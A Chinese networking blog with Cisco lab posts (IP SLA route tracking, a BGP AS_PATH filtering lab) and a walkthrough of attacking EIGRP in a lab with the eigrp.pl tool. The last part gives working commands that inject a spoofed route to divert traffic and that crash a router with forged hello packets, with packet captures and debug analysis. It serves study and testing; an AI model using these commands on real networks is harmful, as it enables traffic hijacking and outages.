无色无味(杨波) 的Web Log(博客)
利用SLA监控静态路由非直连DOWN
大家都知道如果你的静态路由的下一跳DOWN掉,静态路由会在路由表消失。但是如果非直连DOWN,一般还会存在在你的本地路由表。
但是我使用SLA可做到检测非直连DOWN
R1——————————R2————————-R3
12.1.1.1 1.2 23.1.1.2 1.3
ip sla monitor 123
type echo protocol ipIcmpEcho 23.1.1.3 source-ipaddr 12.1.1.1
frequency 10
ip sla monitor schedule 123 life forever start-time now
track 1 rtr 123 reachability
ip route 23.1.1.0 255.255.255.0 12.1.1.2 track 1
ip route 23.1.1.0 255.255.255.0 12.1.1.2
把R3的接口DOWN掉,在R1show ip route 测试
原文由:kinglab发帖,经修改后发帖!
CCNP将在2009年末重大改版 考试费有望部分下调
Lab 6-2 Using the AS_PATH Attribute (练习AS-path属性)
网络拓扑图:
Learning Objective
In this lab, you will use BGP commands to prevent private AS numbers from
being advertised to the outside world. You will also use the AS_PATH attribute to
filter BGP routes based on their source AS numbers.
Scenario
The International Travel Agency’s ISPhas been assigned an AS number of 300.
This provider uses BGP to exchange routing information with several customer
networks. Each customer network is assigned an AS number from the private
range, such as AS 65000. Configure ISP to remove the private AS numbers
within the AS_Path information from CustRtr. In addition, the ISP would like to
prevent its customer networks from receiving route information from International
Travel Agency’s AS 100. Use the AS_PATHattribute to implement this policy.
Step 1: IP Addressing
Build and configure the network according to the diagram, but do not configure a
routing protocol.
Use ping to test the connectivity between the directly connected routers. Note
that SanJose cannot reach the customer network for CustRtr. It cannot reach it
by the IP address in the link leading to CustRtr nor the loopback interface
202.0.0.1/24.
Note: SanJose will not be able to reach the customer network for ISP,
CustRtr. It will not be able to reach it by the IP address in the link leading
to the CustRtr, nor the loopback interface, 202.0.0.1/24.
Step 2: Configure BGP
Configure BGP for normal operation. Enter the appropriate BGP commands on
each router so that they identify their BGP neighbors and advertise their
loopback networks:
SanJose(config)#router bgp 100
SanJose(config-router)#neighbor 192.168.1.6 remote-as 300
SanJose(config-router)#network 201.0.0.0
ISP(config)#router bgp 300
ISP(config-router)#neighbor 192.168.1.5 remote-as 100
ISP(config-router)#neighbor 172.24.1.18 remote-as 65000
ISP(config-router)#network 202.0.0.0
CustRtr(config)#router bgp 65000
CustRtr(config-router)#neighbor 172.24.1.17 remote-as 300
CustRtr(config-router)#network 203.0.0.0
Verify that these routers have established the appropriate neighbor relationships
by issuing the show ip bgp neighbors command on each router.
Step 3: Remove the Private AS
Check SanJose’s routing table by using theshow ip route command. SanJose
should have a route to both 202.0.0.0 and 203.0.0.0. Troubleshoot, if necessary.
Ping the 203.0.0.1 address from SanJose. Why does this fail?
Ping again, this time as an extended ping, sourcing from the Loopback 0
interface as follows:
SanJose#ping
Protocol [ip]:
Target IP address: 203.0.0.1
Repeat count [5]:
Datagram size [100]:
Timeout in seconds [2]:
Extended commands [n]: y
Source address or interface: 201.0.0.1
Type of service [0]:
Set DF bit in IP header? [no]:
Validate reply data? [no]:
Data pattern [0xABCD]:
Loose, Strict, Record, Timestamp, Verbose[none]:
Sweep range of sizes [n]:
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 203.0.0.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 64/64/68 ms
Check the BGP table from SanJose by using the show ip bgp command. Note
the AS path for the 203.0.0.0 network. The AS 65000 should be listed in the path
to 203.0.0.0. Why is this a problem?
BGP table version is 4, local router ID is 201.0.0.1
Status codes: s suppressed, d damped, h history, * valid, > best, i –
internal Origin codes: i – IGP, e – EGP, ? – incomplete
Network Next Hop Metric LocPrf Weight Path
*> 201.0.0.0 0.0.0.0 0 32768 i
*> 202.0.0.0 192.168.1.6 0 0 300 i
*> 203.0.0.0 192.168.1.6 0 300 65000 i
Configure ISP to strip the private AS numbers from BGP routes exchanged with
SanJose. Use the following commands:
ISP(config)#router bgp 300
ISP(config-router)#neighbor 192.168.1.5 remove-private-as
After issuing these commands, use the clear ip bgp * command on SanJose to
reestablish the BGP relationship between the three routers.
Wait several seconds, and then return to SanJose to check its routing table.
Does SanJose still have a route to 203.0.0.0?
SanJose should be able to ping 203.0.0.0.
Now check the BGP table on SanJose. The AS_PATH to the 203.0.0.0 network
should be AS 300.
BGP table version is 8, local router ID is 201.0.0.1
Status codes: s suppressed, d damped, h history, * valid, > best, i –
internal Origin codes: i – IGP, e – EGP, ? – incomplete
Network Next Hop Metric LocPrf Weight Path
*> 201.0.0.0 0.0.0.0 0 32768 i
*> 202.0.0.0 192.168.1.6 0 0 300 i
*> 203.0.0.0 192.168.1.6 0 300 i
Step 4: Use the AS_PATH Attribute to Filter Routes
As a final configuration, use the AS_PATH attribute to filter routes based on their
origin. In a complex environment, this attribute can be used to enforce routing
policy. In this case, the provider router, ISP, must be configured so that it does
not propagate routes that originate from AS 100 to the customer router, CustRtr.
First, configure a special kind of access list to match BGP routes with an
AS_PATH attribute that both begins and ends with the number 100. Enter the
following commands on ISP:
ISP(config)#ip as-path access-list 1 deny ^100$
ISP(config)#ip as-path access-list 1 permit .*
AS-path access lists are read like regular access lists, in that they are read
through in order and have an implicit deny at the end. Rather than matching an
address in each statement, like a conventional access-list, they match on
something called regular expressions. Regular expressions are a way of
matching text patterns, and have many uses. In this case, we will using them in
the AS-path access list to match text patterns in AS-paths.
The first command above uses the ^ character to indicate that the AS_PATH
must begin with the given number 100. The $ character indicates that the
AS_PATH attribute must also end with 100. Essentially, this statement matches
only paths that are sourced from AS 100. Other paths, which might include AS
100 along the way, will not match this list.
In the second statement, the . character is a wildcard, and the * symbol stands
for a repetition of the wildcard. Together, .* matches any value of the AS_PATH
attribute, which in effect permits any update that has not been denied by the
previous access-list statement.
For more details on configuring regular expressions on Cisco routers, use the
following link:
Now that the access list has been configured, apply it as follows:
ISP(config)#router bgp 300
ISP(config-router)#neighbor 172.24.1.18 filter-list 1 out
The out keyword specifies that the list is applied to routing information sent to
this neighbor.
Use the clear ip bgp * command to reset the routing information. Wait several
seconds, and then check the routing table for ISP. The route to 201.0.0.0 should
be in the routing table.
Check the routing table for CustRtr. It should not have a route to 201.0.0.0 in its
routing table.
Return to ISP and verify that the filter is working as intended. Issue the command
show ip bgp regexp ^100$.
The output of this command shows all matches for the regular expressions that
were used in the access list. The path to 201.0.0.0 matches the access list and is
filtered from updates to CustRtr.
ISP#show ip bgp regexp ^100$
BGP table version is 4, local router ID is 202.0.0.1
Status codes: s suppressed, d damped, h history, * valid, > best, i –
internal Origin codes: i – IGP, e – EGP, ? – incomplete
Network Next Hop Metric LocPrf Weight Path
*> 201.0.0.0 192.168.1.5 0 0 100 i
以上内容均为实验手册上面的东东:
做了这个实验,我学到了几点:
1.可以使用remove-private-as 去掉(隐藏)私有AS区域号。
2.As-path的使用需要先定义一个as-path access-list. (ip as-path access-list number(1-500) deny{permit} 正式表达式)
3.然后再应用在neighbor上面就OK了。
模拟器的.NET文件和配置下载:
Cisco技术沙龙虚拟演讲厅
知识就是力量 无忧网客联盟在线技术沙龙大会
知识就是力量 无忧网客联盟携手北京wolf实验室,北京cj-club, 陕西西安时代教育,浙江博学教育等实力培训公司奉献出精彩的技术课程。会员可以和众多名师能与面对面的技术讨论,交流。
以下课程都是进入思科演讲厅进行参加活动,请回复此帖子就可以看到演讲厅号码与进入ppt系统的key
此技术沙龙晚上7.30语音提前开始测试,桌面提前10分中测试。开会后半个小时将会锁定会议系统,到时候除绿色通道以外的帐号都无法进入语音系统,以免打扰老师讲课。谢谢大家支持!!其他早上的课程都是一样操作方法。
net527超级技术沙龙群 35744555
在线技术沙龙第一阶段
日期 时间 课程 老师 培训公司 备注
10月19日 20:00-22:00 MPLS/VPN技术架构 Calvin.Cai 陕西时代教育 Rs & Isp 双料CCIE
10月22日 20:00-22:00 MPLS TE流量工程
Calvin.Cai 陕西时代教育 Rs & Isp 双料CCIE
10月23日 20:00-22:00 AToM/VPLS二层MPLS VPN Calvin.Cai 陕西时代教育 Rs & Isp 双料CCIE
10月24日 09:00-11:00
ASA防火墙搭建SSL VPN
秦柯 wolf实验室
WOLF安全掌门人(明教教主)
10月25日 09:00-11:00
IOS实现Group Encrypted Transport VPN 秦柯 wolf WOLF安全掌门人(明教教主)
以下内容需要回复才能看到
ispeak 房间号
无忧网客联盟思科厅 248169
进入ppt的路径。
http://meeting.zoho.com/login/enterdetails.jsp?invalid=true&email=null&name=null
课程科目 ppt共享
MPLS/VPN技术架构 161 795 8170
MPLS TE流量工程 264 071 4530
AToM/VPLS二层MPLS VPN 384 559 8730
ASA防火墙搭建SSL VPN 600 462 4520
IOS实现Group Encrypted Transport 762 013 2860
请大家参照课程表,里面有具体事件和老师。
不会参加次会议请参考一下帖子
http://bbs.net527.cn/thread-15673-1-1.html
Eigrp恶意插入路由和致瘫攻击测试案例
我们已经将动态路由协议运行成eigrp,并且收敛完毕。
这里,需要一个采用perl脚本工具来完成这次试验,具体文件附件中可以下载。我们同样采用ubuntu作为攻击平台。
获得eigrp-tools.pl,解开至任意目录,可以看到非常简单的文件:
-rwxrwxrwx 1 sc sc 1120 2005-12-19 06:58 eigrp.conf
-rwxrwxrwx 1 sc sc 36259 2005-12-19 06:58 eigrp.pl
-rwxrwxrwx 1 sc sc 1004 2005-12-19 07:00 MINI-README
这里说明下,.pl是主要的攻击脚本,.conf是为了方便使用者,可以用配置文件的方式把参数预设好,一旦pl指令中没有输入这些参数,将从该配置文件读取。
一、检查perl脚本环境拿到脚本或源码,向来是不指望一次成功的,先看看缺什么。
[email=1root@sc-desktop:%7E/eigrp-tools]root@sc-desktop:~/eigrp-tools[/email]# perl eigrp.pl
Can’tlocate Net/RawIp.pm in @INC (@INC contains: /etc/perl/usr/local/lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5/usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10/usr/local/lib/site_perl .) at eigrp.pl line 9.
BEGIN failed–compilation aborted at eigrp.pl line 9.
这里提下解决问题的思路,外事问google,内事问狗狗,这是外事,我们求助google。
任何问题(除了你未来的老婆叫什么……貌似这个现在也有很多算命网站可以测)基本都有答案,所以路在嘴上这句话没错,关键在于怎么搜索;在我看来,递归的查询方式是最有效的,我们以此例为证。
不用假设,我也是个perl盲,在这次试验中,我仅仅是想使用这个perl脚本做网络攻击测试,而非去研究perl本身,所以要抓住主要矛盾。
1、首先我们搜索这句”Can’t locate Net/RawIp.pm in”,先看看有没有直接的解决办法,结果得到的信息非常零碎,有人在问同样的问题,但是提供的解答都是请安装模块。
2、接下来转变方向,搜索”perl install modular”,这下很多了,如何安装有非常详细的教程。这里,我们不去看完整的教程,只需找google结果中相应的实例。我找到了一条只有几句话的结果,其中提到了cpan。
3、立刻在bash下尝试cpan,得到了cpan[1]>提示符,根据自觉,应该是进入到了某种模式界面,类似与mysql>;help一下,看到了install字样。
4、立刻尝试:
cpan[5]> install rawip
Warning: Cannot install rawip, don’t know what it is.
Try the command
i /rawip/
to find objects with matching identifiers.
5、很好,虽然它不懂我要干什么,但是有提示了,显然是不知道名字吧,那我们照着提示做:
cpan[6]> i /rawip/
Distribution SAPER/Net-RawIP-0.25.tar.gz
Module Net::RawIP (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::ethhdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::generichdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::icmphdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::iphdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP:
pt (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::tcphdr (SAPER/Net-RawIP-0.25.tar.gz)
Module Net::RawIP::udphdr (SAPER/Net-RawIP-0.25.tar.gz)
9 items found
6、原来是我没有入乡随俗,我们要客随主便:
cpan[7]> install Net::RawIP
Running install for module ‘Net::RawIP’
CPAN: Data:
umper loaded ok (v2.121_14)
‘YAML’ not installed, falling back to Data:umper and Storable to read prefs ‘/root/.cpan/prefs’
Running make for S/SA/SAPER/Net-RawIP-0.25.tar.gz
CPAN: LWP::UserAgent loaded ok (v5.810)
I would like to connect to .e of the following sites to get ‘authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz’:
[url]http://www.perl.org/CPAN/[/url]
[url]ftp://ftp.perl.org/pub/CPAN/[/url]
Is it OK to try to connect to the Internet? [yes]
Fetching with LWP:
[url]http://www.perl.org/CPAN/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz[/url]
CPAN: Digest::SHA loaded ok (v5.45)
Checksum for /root/.cpan/sources/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz ok
Scanning cache /root/.cpan/build for sizes
………………………..(省略)…………………………………..
CPAN: File::Temp loaded ok (v0.18)
Warning (usually harmless): ‘YAML’ not installed, will not store persistent state
CPAN.pm: Going to build S/SA/SAPER/Net-RawIP-0.25.tar.gz
Compiler: cc
cc (Ubuntu 4.3.2-1ubuntu11) 4.3.2
Copyright © 2008 Free Software Foundation, Inc.
本程序是自由软件;请参看源代码的版权声明。本软件没有任何担保;
包括没有适销性和某一专用目的下的适用性担保。
Could not load the pcap library. Please see the README file . how
to install it. Be sure to also install the C headers (pcap.h).
Warning: No success . command[/usr/bin/perl Makefile.PL INSTALLDIRS=site]
Warning (usually harmless): ‘YAML’ not installed, will not store persistent state
SAPER/Net-RawIP-0.25.tar.gz
/usr/bin/perl Makefile.PL INSTALLDIRS=site — NOT OK
Running make test
Make had some problems, won’t test
Running make install
Make had some problems, won’t install
Could not read ‘/root/.cpan/build/Net-RawIP-0.25-Yx2FXb/META.yml’. Falling back to other methods to determine prerequisites
Failed during this command:
SAPER/Net-RawIP-0.25.tar.gz : writemakefile NO ‘/usr/bin/perl Makefile.PL INSTALLDIRS=site’returned status 512
没有安装成功,但是它告知了问题,一个是YAML没有装,另一个是缺pcap.h;凭直觉,后者应该是系统的包。
7、先解决YAML:
cpan[11]> install YAML
Running install for module ‘YAML’
‘YAML’ not installed, falling back to Data::Dumper and Storable to read prefs ‘/root/.cpan/prefs’
Running make for I/IN/INGY/YAML-0.68.tar.gz
Fetching with LWP:
[url]http://www.perl.org/CPAN/authors/id/I/IN/INGY/YAML-0.68.tar.gz[/url]
Fetching with LWP:
[url]http://www.perl.org/CPAN/authors/id/I/IN/INGY/CHECKSUMS[/url]
Checksum for /root/.cpan/sources/authors/id/I/IN/INGY/YAML-0.68.tar.gz ok
………………………………………………………………….DONE
Found 1 old build, restored the state of 1
顺利安装成功。
8、接下来再搜pcap.h,可以看到需要安装libpcap的dev包。其实这里有个捷径,因为我们之前已经下载了”/root/.cpan/sources/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz”,可以进这个包看里面的readme,也会提到安装pcap.h的问题。这里apt-get install libpcap0.8-dev即可。
9、这次再install Net::RawIP成功了。再次运行eigrp脚本,报缺NetPacket/Ethernet.pm,用同样的方式查询后安装,顺利完成。
采用这种思路解决问题,速度较快,但是缺点也很明显,街头篮球,完整的知识体系较为欠缺,没有对perl产生完整的概念。
现在,环境准备完毕了,可以看下这个脚本的强大参数:
[email=root@sc-desktop:%7E/eigrp-tools]root@sc-desktop:~/eigrp-tools[/email]# perl eigrp.pl
Using config file eigrp.conf…
eigrp.pl, , V 0.1
This program was originally created for the book “Hacking Exposed: Cisco Networks”
Authors Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs and comments
to info[dot]arhont.com
usage: eigrp.pl [--sniff] [ --iface=inteterface ] [--timeout=i]
Options:
–sniff Sniff eigrp packets
–iface Listen . an interface
–iflist List all available network interfaces
–source Source IP address
–dest Packet destination IP. Default multicast IP – 224.0.0.10
–timeout=n pcap init timeout (500 default)
–hello Send EIGRP HELLO
–update Update route
–query Send [Query] (Unreachable destination )
–external External route
–internal Internal route
–ipgoodbye=s IP to [Goodbye message] Authentification replay not implemented
–file2ip=s Send raw sniffed eigrp data from file to IP
–payback Sniff the UPDATE packet, change [Delay] and send it back (PoC)
–op=n EIGRP opcode number to trigger, capture a packet defined by the trigger .to a disk
–sn=n EIGRP sequence number to trigger
–auth Authentication data for the reply atack (copy past hex from sniff)
–opcode Custom opcode for hello packets fuzzing
–flags=n EIGRP flags (0,1 or 2)
–version=n EIGRP version [8 bit integer] Default = 2
–as=n Autonomous system number, Default = 1
–k1=n Metric K1 Default 1
–k2=n Mertic K2 Default 0
–k3=n Mertic K3 Default 1
–k4=n Mertic K4 Default 0
–k5=n Mertic K4 Default 0
–mtu=n MTU
–nms=n Add NMS (Next multicast message) to Hello packet
–eigrpv=s EIGRP release version
–ios=s IOS version
–hopcount=n Hop count
–reliability=n Reliability
–load=n Load
–delay=n Delay
–sequence=n Sequence (32bit sequence) Default = 0
–ack=n Acknowledge (32bit sequence) Default = 0
–nexthop=s Next Hop
–bandwidth=n Bandwidth
–routedest=s Route destination
–origrouter=s Originating router
–origas=n Originating Autonomous system number
–arbitatag=n Arbitrary tag
–metric=n protocol metric (external EIGRP metric for the external updates)
–extproto=n External protocol ID IGRP(1) EIGRP(2) Static Route(3) RIP(4)
HELLO(5) OSPF(6) IS_IS(7) EGP(8) BGP(9) IDRP(10) Connected link(11)
–hold=n Hold time in seconds
–hellotime=n Hello send retries timeout . Default = 5 sec
–hellodos=s IP subnet. Warning! Nasty DOS atack ! Send HELLO EIGRP Argument from IP range.
–retries=n Packet send retries Default = 1;
Example :
./eigrp.pl –sniff –iface eth0
./eigrp.pl –ipgoodbye 192.168.66.202 –source 192.168.7.8
./eigrp.pl –file2ip update.dat –source 192.168.7.8
./eigrp.pl –update –external –as 65534 –source 192.168.7.8
./eigrp.pl –hello –auth 00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52
–source 192.168.77.8 –nms 1
./eigrp.pl –help This message
[email=root@sc-desktop:%7E/eigrp-tools]root@sc-desktop:~/eigrp-tools[/email]#
二、探测周边环境利用脚本中的嗅探功能,检查一下周围的环境,如果是在陌生环境中,可以借此了解拓扑信息。
[email=root@sc-desktop:%7E/eigrp-tools]root@sc-desktop:~/eigrp-tools[/email]# ./eigrp.pl –sniff –iface eth0
Using config file eigrp.conf…
./eigrp.pl, , V 0.1
Use of uninitialized value in subroutine entry at /usr/local/lib/perl/5.10.0/Net/RawIP.pm line 640.
Link Offset: 14..
Sniffing interface: eth0
***************************************************************
Source MAC:c2040d400000 Dest MAC:01005e00000a
Source IP: 192.168.1.249 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 05 ee cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 0c 01
00 01 00 00 00 00 0f 00 04 00 08 0c 04 01 02
Version: 2
Opcode:05 <Hello/Ack>
Checksum: 0xeecb <* Correct *>
Flags: 0 Sequnce :0
Acknowledge: 0
Autonomus system number: 1
<<<EIGRP Parameters: 0001 >>>
Size: 12
K1: 1 K2: 0 K3: 1 K4: 0 K5: 0,
Reserved: 0 Hold Time: 15
<<<Software Version 0004 >>>
Size: 8
IOS version: 12.4
EIGRP version 1.2
***************************************************************
Source MAC:c2030d400000 Dest MAC:01005e00000a
Source IP: 192.168.1.251 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 05 ee cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 0c 01
00 01 00 00 00 00 0f 00 04 00 08 0c 04 01 02
Version: 2
Opcode:05 <Hello/Ack>
Checksum: 0xeecb <* Correct *>
Flags: 0 Sequnce :0
Acknowledge: 0
Autonomus system number: 1
<<<EIGRP Parameters: 0001 >>>
Size: 12
K1: 1 K2: 0 K3: 1 K4: 0 K5: 0,
Reserved: 0 Hold Time: 15
<<<Software Version 0004 >>>
Size: 8
IOS version: 12.4
EIGRP version 1.2
我们可以看到网内的两台eigrp路由器,eigrp版本,ios版本;
水煮豆豆注:这里要特别提下K值的问题,很多学习过eigrp的人对K值不甚理解,cisco花了很大的力气设计出5个值,却又建议用户不要随便修改。其实我们可以简单的这样理解,K值作为一个高阶用户参数的存在,是为了提供更大的网络设计灵活性,调整5个参数可以方便的在延时和稳定性方面做出选择,究竟是要更稳定还是要更小的延时。仅此而已。
现在,我们的攻击方和被攻击的路由器都准备好了,可以开始进行实验。
三、插入恶意路由首先来回顾下eigrp的特性,eigrp在设计DUAL算法时,为了最大限度的节省动态路由占用网络的带宽,不采用链路状态协议的实时更新算法,即定期告知周知路由信息,而是采用触发更新的方式,在本机路由遭到变化时,仅将变化的路由通告,也就是指,在邻居hello信息存活的情况下,我们的R0将始终保持住攻击方压入他的一条恶意路由,直到R1的hello出现问题,才重新协商。
1、我们首先看下正常情况下两机路由:
R0#sh ip route
Gateway of last resort is not set
D 172.16.0.0/16 [90/307200] via 192.168.1.249, 20:55:19, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
R1#sh ip route
Gateway of last resort is not set
172.16.0.0/16 is variably subnetted, 2 subnets, 2 masks
C 172.16.0.0/24 is directly connected, FastEthernet0/1
D 172.16.0.0/16 is a summary, 21:14:43, Null0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
R0收到R1的一条通告,因为R1上有直连的172.16网络。
2、接下来攻击方发送恶意路由信息:
./eigrp.pl –update –internal –source 192.168.1.249 –routedest 172.16.0.0/16 –nexthop 192.168.1.36
这里,update表示发送更新,internal表示插入标记为eigrp内部的路由通告,source伪造发送更新的路由器,routedest要插入的路由,nexthop插入路由的下一条地址。
水煮豆豆注:要非常注意的一个问题:攻击方采用的perl脚本环境里面的RawIP.pm有个严谨的网络地址检测机制,即网络设置中,主机地址和网关不在一个掩码内,或者不存在网关,都将导致错误如下:
首先看下效果:
嗅探发送的出的恶意路由数据:
***************************************************************
Source MAC:000c29c57e29 Dest MAC:01005e00000a
Source IP: 192.168.1.249 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 01 01 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 02 00 1c c0
a8 01 24 00 00 2e e0 00 00 01 00 00 05 ea 01 ff 01 00 00 10 ac 10 00
Version: 2
Opcode:01 <Update>
Checksum: 0×17e <* Correct *>
Flags: 0 Sequnce :0
Acknowledge: 0
Autonomus system number: 1
<<<IP internal route: 0102 >>>
Size: 28
Next hop: 192.168.1.36
Delay: 12000 Bandwidth: 256
MTU: 1514 Hop count: 1
Reliability:255 Load: 1
Reserved 0
Prefix Length: 16
Destination: 172.16.0.
恶意路由发送出的是一条eigrp update数据。
然后检查路由器R0:
R0#sh ip route
Gateway of last resort is 192.168.1.36 to network 0.0.0.0
D 172.16.0.0/16 [90/293600] via 192.168.1.36, 00:00:17, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
D* 0.0.0.0/0 [90/319200] via 192.168.1.36, 00:00:17, FastEthernet0/0
我们看到原本指向249的路由现在指向了36。即我们的攻击方,R0现在将172.16网段的数据发向我们了。
在249这个邻居保持在线的前提下,R0将始终保持这条路由直到邻居失效。
现在问题来了,作为一个内部插入路由,为什么出现了一条指向36的默认路由??
引申研究:为什么会多插入默认路由?我们对比下正常的来自R1的更新数据:
***************************************************************
Source MAC:c2040d400000 Dest MAC:01005e00000a
Source IP: 192.168.1.249 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 01 b4 ac 00 00 00 0a 00 00 00 72 00 00 00 00 00 00 00 01 01 02 00 1b 00
00 00 00 00 00 64 00 00 03 e8 00 00 05 dc 00 ff 01 00 00 10 ac 10
Version: 2
Opcode:01 <Update>
Checksum: 0xb4ac <* Correct *>
Flags: 10 Sequnce :114
Acknowledge: 0
Autonomus system number: 1
<<<IP internal route: 0102 >>>
Size: 27
Next hop: 0.0.0.0
Delay: 25600 Bandwidth: 256000
MTU: 1500 Hop count: 0
Reliability:255 Load: 1
Reserved 0
Prefix Length: 16
Destination: 172.16..
貌似正常的更新和我们伪造的更新相比差别就在此处,那为什么这个差别会造成,正常的更新没有插入默认路由,而伪造的却插入了呢?我们将伪造的nexthop地址也做修改:
./eigrp.pl –update –internal –source 192.168.1.249 –routedest 172.16.0.0/16 –nexthop 0.0.0.0
在修改nexthop参数的情况下,结果变成:
D 172.16.0.0/16 [90/293600] via 192.168.1.249, 00:00:02, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
D* 0.0.0.0/0 [90/319200] via 192.168.1.249, 00:00:02, FastEthernet0/0
可以看到默认路由仍然存在,但是指向的源由36变成了249,研判在0.0.0.0和192.168.1.36;192.168.1.249的比较中,默认采用了最大地址的算法?
四、攻击eigrp方式一对于这个话题,著名的设备黑客FX曾经很早就做过一次dos演示,但是没有公开技术细节。我们从改脚本的幕后信息了解到,核心思想是从多个伪造的源IP向eigrp路由器泛洪hello数据,导致目标路由器开始搜索这些新邻居,引发arp风暴。最终导致网络和设备宕机。
我们来进行下测试:
./eigrp.pl –hellodos 192.168.1.0 –source 192.168.1.249
解释一下,hellodos参数为伪造源的网段,source的意思就是伪造hello的源地址。
屏幕开始翻滚,从192.168.1.1开始顺序递增,我们看下路由器的反应:
R0#
*Mar 3 04:49:36.670:%DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249(FastEthernet0/0) is down: Remote peer static/dynamic
*Mar 3 04:49:38.178: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249 (FastEthernet0/0) is up: new adjacency
R1#
*Mar 3 04:49:36.166:%DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.251(FastEthernet0/0) is down: Interface Goodbye received
*Mar 3 04:49:37.762: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.251 (FastEthernet0/0) is up: new adjacency
可以看出,攻击数据发出后,R1首先得到R0挂掉的消息(Goodbye,这个cisco设计的有意思,路由器成了人语者,呵呵),其实它的官方术语叫妥善关闭。这是cisco为了将eigrp设计为快速收敛的网络而煞费苦心创建的,理由是为了避免要等待计时器超时,任何eigrp进程在关闭时都将广播一条goodbye,告知其他设备你们不用等了。问题是,这个网络里面什么东西触发了251,也就是R0发送了goodbye?真的是arp的dos么?
1、攻击脚本干了什么?在36出来的路上抓包看看:
我们在pl脚本运行后,发现网内出现了大量的arp包,仔细观察,查询的目标地址在192.168.1.0/24循环,循环三次后递增到下一个C类。可以非常明确的看出,攻击源在查询网内的目标的mac地址!好,问题也就出来了,按照常规,我们对DoS的理解,是伪造不同的源地址对某个或某几个特定的目标进行轰炸,而非单一源对整个网段的攻击。因此,可以肯定的是,这个脚本参数的真正原理绝非是泛洪式的拒绝服务,而是针对目标发送了相应的数据包导致路由器宕机的。果不其然,在反复测试几次后,R0都规律性的瞬间宕机,而非慢慢的资源耗尽的宕机,可见是不正常的数据包所致。
那么攻击脚本在网内查询到R0和R1的地址后又做了什么呢?抓包分析:
可以看到,真正的eigrp组播都已红色表示,黑色的是icmp的不可达返回,浅黄色的就是脚本的攻击包了。也就是说,其实脚本发出的包总共就两个,因为网内就这两个地址可以arp解析到。
按照时间顺序,我们来梳理下过程(已在路由上打开debug ip eigrp、debug ip pack、debug ei fsm、debug ei pack;时钟已同步):
1、首先,网内只有正常的hello邻居保持协商:
R0
Feb 1 07:02:28.057: IP: s=192.168.1.251 (local), d=224.0.0.10 (FastEthernet0/0), len 60, sending broad/multicast
Feb 1 07:02:28.061: EIGRP: Sending HELLO . FastEthernet0/0
Feb 1 07:02:28.061: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0
Feb 1 07:02:29.648: IP: s=192.168.1.249 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 1 07:02:29.656: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb 1 07:02:29.660: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
R1
Feb 1 07:02:28.066: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 1 07:02:28.074: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.251
Feb 1 07:02:28.078: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 07:02:29.590: IP: s=192.168.1.249 (local), d=224.0.0.10 (FastEthernet0/0), len 60, sending broad/multicast
Feb 1 07:02:29.594: EIGRP: Sending HELLO . FastEthernet0/0
Feb 1 07:02:29.594: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0
我们先看看正常的hello包:
2、紧接着,脚本送出了第一个249到249的包:
完全正常的格式,和路由器发出的hello包没什么不同,唯一的区别就是目的地址不再是组播224.0.0.10,而是一个实际的地址。
那么249收到后如何反应?
R1
Feb 1 07:02:45.562: IP: tableid=0, s=192.168.1.249 (FastEthernet0/0), d=192.168.1.249 (FastEthernet0/0), routed via RIB
Feb 1 07:02:45.562: IP: s=192.168.1.249 (FastEthernet0/0), d=192.168.1.249 (FastEthernet0/0), len 60, rcvd 3
Feb 1 07:02:45.566: EIGRP: Received HELLO . FastEthernet0/0 nbr 192.168.1.249
Feb 1 07:02:45.566: AS 1, Flags 0×0, Seq 0/0 idbQ 0/0
Feb 1 07:02:45.566: EIGRP: Packet from ourselves ignored
R1处理了这个包,并且忽略了它;这里说明了两个问题,首先是eigrp设计为能够处理单播的hello数据;其次这个包并不是引发路由器问题的原因。
3、随后,脚本又送出了一个249到251的包。
看看R0如何反应的?
R0
Feb 1 07:02:45.840:%DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249(FastEthernet0/0) is down: Remote peer static/dynamic
